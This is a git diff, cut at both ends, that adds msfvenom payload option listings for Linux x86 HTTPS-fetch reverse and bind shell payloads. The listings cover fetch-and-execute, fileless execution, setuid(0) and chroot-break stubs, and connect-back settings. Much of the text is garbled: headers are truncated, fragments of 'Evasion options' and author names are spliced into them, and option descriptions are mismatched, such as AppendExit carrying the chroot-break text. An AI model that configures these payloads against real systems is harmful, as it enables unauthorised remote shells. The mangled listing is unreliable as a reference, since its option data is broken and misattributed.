session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-shell-reverse_nonx_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x86-shell-reverse_nonx_tcp.txt new file mode 100644 index 0000000..283a3bf --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-shell-reverse_nonx_tcp.txt @@ -0,0 +1,102 @@ + + Name: HTTPS Fetch, Linux Command Shell, Reverse TCP Stager + Module: payload/cmd/linux/https/x86/shell/reverse_nonx_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total si +Evasion options for payload/cmd/linux/https/x86/shell/reverse_nonx_tcp: +========================= + +r@hick.org> + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME APdgfgVHBusd no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + Spawn a command shell (staged). + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-shell-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x86-shell-reverse_tcp.txt new file mode 100644 index 0000000..1d7fbfb --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-shell-reverse_tcp.txt @@ -0,0 +1,104 @@ + + Name: HTTPS Fetch, Linux Command Shell, Reverse TCP Stager + Module: payload/cmd/linux/https/x86/shell/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Tot +Evasion options for payload/cmd/linux/https/x86/shell/reverse_tcp: +========================= + +pe + egypt + tkmru + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME JcnAayht no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + Spawn a command shell (staged). + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-shell-reverse_tcp_uuid.txt b/msfvenom/payload_options/cmd-linux-https-x86-shell-reverse_tcp_uuid.txt new file mode 100644 index 0000000..1688b45 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-shell-reverse_tcp_uuid.txt @@ -0,0 +1,104 @@ + + Name: HTTPS Fetch, Linux Command Shell, Reverse TCP Stager + Module: payload/cmd/linux/https/x86/shell/reverse_tcp_uuid + Platform: Linux + Arch: cmd +Needs Admin: No + Total si +Evasion options for payload/cmd/linux/https/x86/shell/reverse_tcp_uuid: +========================= + +r@hick.org> + egypt + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME PuAcJbYKt no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + Spawn a command shell (staged). + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-shell_bind_ipv6_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x86-shell_bind_ipv6_tcp.txt new file mode 100644 index 0000000..ac8696b --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-shell_bind_ipv6_tcp.txt @@ -0,0 +1,85 @@ + + Name: HTTPS Fetch, Linux Command Shell, Bind TCP Inline (IPv6) + Module: payload/cmd/linux/https/x86/shell_bind_ipv6_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 107 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + kris katterjohn + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME aJwFYAkIV no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + Listen for a connection over IPv6 and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-shell_bind_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x86-shell_bind_tcp.txt new file mode 100644 index 0000000..651b1fd --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-shell_bind_tcp.txt @@ -0,0 +1,85 @@ + + Name: HTTPS Fetch, Linux Command Shell, Bind TCP Inline + Module: payload/cmd/linux/https/x86/shell_bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 113 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Ramon de C Valle + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME ZaUEqHDzZSP no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + Listen for a connection and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-shell_bind_tcp_random_port.txt b/msfvenom/payload_options/cmd-linux-https-x86-shell_bind_tcp_random_port.txt new file mode 100644 index 0000000..f7615dc --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-shell_bind_tcp_random_port.txt @@ -0,0 +1,82 @@ + + Name: HTTPS Fetch, Linux Command Shell, Bind TCP Random Port Inline + Module: payload/cmd/linux/https/x86/shell_bind_tcp_random_port + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 116 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Geyslan G. Bem + Aleh Boitsau + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME btKUNQDJWbxC no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + + Listen for a connection in a random port and spawn a command shell. + Use nmap to discover the open port: 'nmap -sS target -p-'. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable 